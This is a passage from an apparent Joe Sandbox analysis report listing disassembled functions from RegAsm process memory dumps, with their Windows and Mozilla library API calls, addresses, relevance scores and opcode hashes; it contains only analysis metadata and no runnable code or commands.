Part of subcall function 6C8789E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C8788AE,-00000008), ref: 6C878A04
Part of subcall function 6C8789E0: EnterCriticalSection.KERNEL32(?), ref: 6C878A15
Part of subcall function 6C8789E0: memset.VCRUNTIME140(6C8788AE,00000000,00000132), ref: 6C878A27
Part of subcall function 6C8789E0: PR_Unlock.NSS3(?), ref: 6C878A35

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 002d15971d66ab871fd29d83327006321c3d975061aaca2d2c0453158e6f9120
Instruction ID: 583e6d55f89ec61eea536dfe2b314b64765913900395a5c7a075e0538b27fcb6
Opcode Fuzzy Hash: 002d15971d66ab871fd29d83327006321c3d975061aaca2d2c0453158e6f9120
Instruction Fuzzy Hash: 8351C9B6E012005FEB209F68DE41AAF37A8DF15258F150934EC169BB12FB31ED1587A2

Function 6C791220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C79124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C791268
GetCurrentThreadId.KERNEL32 ref: 6C7912DA
InitializeConditionVariable.KERNEL32(?), ref: 6C79134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C79138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C791431

Part of subcall function 6C788AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7912F7), ref: 6C788BD5

free.MOZGLUE(?), ref: 6C79145A
free.MOZGLUE(?), ref: 6C79146C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: f953a451d0112d5ce09bb46970c86e869b7baac29f51239e34252e32d7a3a640
Instruction ID: 5035431c0d69210f9c800364a521389e1cf71d29f6267e864a2811e0aca0dc17
Opcode Fuzzy Hash: f953a451d0112d5ce09bb46970c86e869b7baac29f51239e34252e32d7a3a640
Instruction Fuzzy Hash: F261E4756043449FDB10DF25DA88B9AB7F9BFC9308F04892DE89947B12EB30E559CB42

Function 6C790F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C790F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C790F88
GetCurrentThreadId.KERNEL32 ref: 6C790FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C791067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C7910A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C79114B

Part of subcall function 6C788AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7912F7), ref: 6C788BD5

free.MOZGLUE(?), ref: 6C791174
free.MOZGLUE(?), ref: 6C791186

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: f0e8aa76998d45adb04350b1c5d62d5fb5334faabc5e7fadbb370d786f0ac9b8
Instruction ID: cd2d0025ed326aee61f1c6ce12407218a8de649109613d5aeac6e06db36e17dd
Opcode Fuzzy Hash: f0e8aa76998d45adb04350b1c5d62d5fb5334faabc5e7fadbb370d786f0ac9b8
Instruction Fuzzy Hash: E961E5756043449FDB10CF25DA8879AB7FABFC5308F04892DE89947711EB31E559CB41

Function 6C744B50 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C744667,?,?,?,?,?,?,?,?,6C784843,?), ref: 6C744C63
free.MOZGLUE(?,?,?,6C744667,?,?,?,?,?,?,?,?,6C784843,?), ref: 6C744C89
free.MOZGLUE(?,?,?,6C744667,?,?,?,?,?,?,?,?,6C784843,?), ref: 6C744CAC
free.MOZGLUE(?,?,?,?,?,?,?,6C784843,?), ref: 6C744CCF
free.MOZGLUE(?,?,?,?,?,?,?,?,6C784843,?), ref: 6C744CF2
free.MOZGLUE(?,?,?,?,?,?,?,?,6C784843,?), ref: 6C744D15
free.MOZGLUE(?,?,?,?,?,?,?,?,6C784843,?), ref: 6C744D38
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C744667,?,?,?,?,?,?,?,?,6C784843,?), ref: 6C744DD1

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1497960986-0
Opcode ID: 76e94f6ee7d8a0ee9562a2d169d2fc45f7958da7dde11cb5e85394643ebc5c36
Instruction ID: 5a27a42bc8b82cb7b712cac415d6b989f588f480ce071c329ff900e0fef6e458
Opcode Fuzzy Hash: 76e94f6ee7d8a0ee9562a2d169d2fc45f7958da7dde11cb5e85394643ebc5c36
Instruction Fuzzy Hash: EC517272544A408FD7248E3DDAA971676A5AF02328F488B1CE1A7CBFD3D335A544BB41

Function 6C74E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6C751999), ref: 6C74EA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C74EA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C74EA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6C751999), ref: 6C74EA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C751999), ref: 6C74EAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C74EADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C74EB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C74EB27

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: cd67e8f66768abe3b9d2a3fb835a8d203ab37479bb86346546bc38d5c1f41a93
Instruction ID: dc70c05a17409c39c39f5db21081ea2436f773f771a535e73ce468e385477dc2
Opcode Fuzzy Hash: cd67e8f66768abe3b9d2a3fb835a8d203ab37479bb86346546bc38d5c1f41a93
Instruction Fuzzy Hash: 3D4183B1A002199FDB14CF68DD84AAEB7A8BF45268F244638E815EB795E730DA04C7D1

Function 6C79D310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C79D36B
GetCurrentThreadId.KERNEL32 ref: 6C79D38A
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D39D
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D3E1
free.MOZGLUE ref: 6C79D408

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

GetCurrentThreadId.KERNEL32 ref: 6C79D44B
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D457
ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6C79D472

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
String ID:
API String ID: 3843575911-0
Opcode ID: 16c9a444587b986815923eccb70d4dd1f55638e66b8efef1ff6c4c9a85287ea8
Instruction ID: 5f816c69bfb63eb9451ff1d2a470e3b39f394eba2bb25d6c5300d6d180a517f6
Opcode Fuzzy Hash: 16c9a444587b986815923eccb70d4dd1f55638e66b8efef1ff6c4c9a85287ea8
Instruction Fuzzy Hash: 3C41FE71604306CFCB10DF65D588AAEBBB5FF85314F10493EE96297B50EB70A948CB91

Function 6C74B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C74B61E,?,?,?,?,?,00000000), ref: 6C74B6AC

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C74B61E,?,?,?,?,?,00000000), ref: 6C74B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C74B61E,?,?,?,?,?,00000000), ref: 6C74B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C74B61E,?,?,?,?,?,00000000), ref: 6C74B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C74B61E,?,?,?,?,?,00000000), ref: 6C74B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C74B61E), ref: 6C74B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C74B61E,?,?,?,?,?,00000000), ref: 6C74B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C74B61E,?,?,?,?,?,00000000), ref: 6C74B79A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: 550742ce0e71809c23ae0ca6358fdb8da7cb5035f6dd4992bee3d43181dd3b5e
Instruction ID: 0de5830b0ac844f8ed56a140e8624fc77d2aca04850ce2a59e21e74c854923f4
Opcode Fuzzy Hash: 550742ce0e71809c23ae0ca6358fdb8da7cb5035f6dd4992bee3d43181dd3b5e
Instruction Fuzzy Hash: 5341E2B2D005158FCB00DF78DD846AEB7B9BF54324F25462AE825E7781E731AD0487E1

Function 6C74EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C7C5104), ref: 6C74EFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C74EFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C74EFEC
free.MOZGLUE(?), ref: 6C74F00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C74F02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C74F041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C74F065
moz_xmalloc.MOZGLUE ref: 6C74F072

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 0e7c05e8d2124a1c51ba356dbc96167506f84f0beb3d627fa19410ac12a2d06e
Instruction ID: 826a005c4170f4551acf6ffeb212c638b1b3d80c9f42775ce3aba8496696bc91
Opcode Fuzzy Hash: 0e7c05e8d2124a1c51ba356dbc96167506f84f0beb3d627fa19410ac12a2d06e
Instruction Fuzzy Hash: 7541F6B1A002059FCB08CF68DD949AE7769FF84324B244638E815DB7A5EB31E915C7E1

Function 6C7BB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C7BB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C7BB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C7BB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C7BB5F4
__Init_thread_footer.LIBCMT ref: 6C7BB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C7BB61F
std::_Facet_Register.LIBCPMT ref: 6C7BB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7BB655

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: a08fcb5dfe3e72f5d2a6bdaad2f82ce2ff6a20f429fe0b83ddea37058b099a84
Instruction ID: c228417591913962893bcc32d92511cbfcb92463d6c1792afb3736eacbfce16f
Opcode Fuzzy Hash: a08fcb5dfe3e72f5d2a6bdaad2f82ce2ff6a20f429fe0b83ddea37058b099a84
Instruction Fuzzy Hash: D7318471B001068FCF10DF69C9999AEB7B5FF89325B140579E906A7740DB30BA4ACB91

Function 6C786590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C77FA80: GetCurrentThreadId.KERNEL32 ref: 6C77FA8D
Part of subcall function 6C77FA80: AcquireSRWLockExclusive.KERNEL32(6C7CF448,?,6C77FA1F,?,?,6C755407), ref: 6C77FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C786727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C7867C8

Part of subcall function 6C794290: memcpy.VCRUNTIME140(?,?,?,:yl,?,:yl,00000001,?,6C793AED,?,00000001), ref: 6C7942C4

Strings

v|l, xrefs: 6C78696C
data, xrefs: 6C786593

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$v|l
API String ID: 511789754-2500571834
Opcode ID: e4d12df64f6803d95008b62d8772775681c3bca302b0974806422d06eb233564
Instruction ID: 7b40f26f2ae723f0ba0bc4f2b9e69141e1dc778d922fb2dd8a53f4ee6adcb074
Opcode Fuzzy Hash: e4d12df64f6803d95008b62d8772775681c3bca302b0974806422d06eb233564
Instruction Fuzzy Hash: F9D1E074A053409FD724CF25CA48B9EB7E5BFD5308F10893DE18997B91DB30A909CB92

Function 6C77D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C74EB57,?,?,?,?,?,?,?,?,?), ref: 6C77D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C74EB57,?), ref: 6C77D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C74EB57,?), ref: 6C77D673
free.MOZGLUE(?), ref: 6C77D888

Strings

|Enabled, xrefs: 6C77D81E
Wtl, xrefs: 6C77D5D9, 6C77D63F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: Wtl$|Enabled
API String ID: 4142949111-1387902572
Opcode ID: d58a3a0052b0673a13e4dd091e5c6ae5bd10771df5f6911b638479620f3ec45d
Instruction ID: 2746eb1460a0ca15d7db5335b8af1b531c944f9a8335870f60b6eb5fa11de443
Opcode Fuzzy Hash: d58a3a0052b0673a13e4dd091e5c6ae5bd10771df5f6911b638479620f3ec45d
Instruction Fuzzy Hash: 9CA115B0A003098FDF20CF69C5847AEBBF1AF59318F14806CD899AB741D735A945CBB5

Function 6C759830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C7A7ABE), ref: 6C75985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C7A7ABE), ref: 6C7598A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C759909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C759918
free.MOZGLUE(?), ref: 6C759975

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: 71dbbe33e6d2347c6bd2b713c4bd36973979b91a31c785975a1455d64ccc28d1
Instruction ID: 696b04d4804eab71565f0c540628fbad4ced0e460c84b10916c56c86dd104fa0
Opcode Fuzzy Hash: 71dbbe33e6d2347c6bd2b713c4bd36973979b91a31c785975a1455d64ccc28d1
Instruction Fuzzy Hash: 5C71BDB46007058FC724CF28C580956BBF5FF9A3247A44AADD85A8BB91DB31F812CB91

Function 6C75B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C79CC83,?,?,?,?,?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C75B7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C79CC83,?,?,?,?,?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C75B80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C79CC83,?,?,?,?,?,?,?,?,?,6C79BCAE), ref: 6C75B88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C79CC83,?,?,?,?,?,?,?,?,?,6C79BCAE,?,?,6C78DC2C), ref: 6C75B896

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: 1698ac9fba61cf10af564675f77adbac082568ac64358536285a5446485a1ed6
Instruction ID: 6279e5c063328b285d7568a3ba0eaa3f5a3cdf5fe569f887a849876bf36c25a7
Opcode Fuzzy Hash: 1698ac9fba61cf10af564675f77adbac082568ac64358536285a5446485a1ed6
Instruction Fuzzy Hash: A45169757006048FCB25CF59C684A7ABBF5FF89318BA9856DE98A97351CB31F811CB80

Function 6C784AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C784B48
free.MOZGLUE(?,?,?,80000000,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C784B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C784B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C784BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C784BEE

Strings

pid:, xrefs: 6C784BE8

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: 156d03ce254238d5aed5d8a168978dc3f98a4600bd24933885c34c6ebf08488b
Instruction ID: b409f64041836424327cc3549cd440c463047a096dc98ade0edf34046b3e1164
Opcode Fuzzy Hash: 156d03ce254238d5aed5d8a168978dc3f98a4600bd24933885c34c6ebf08488b
Instruction Fuzzy Hash: EB412671B012598FCB10CFB8DD9459FBBFDAF85224B144638E964DB781DB30A90887A1

Function 6C791D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C791D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C791BE3,?,?,6C791D96,00000000), ref: 6C791D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C791BE3,?,?,6C791D96,00000000), ref: 6C791D4C
GetCurrentThreadId.KERNEL32 ref: 6C791DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C791DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C791DDA

Part of subcall function 6C791EF0: GetCurrentThreadId.KERNEL32 ref: 6C791F03
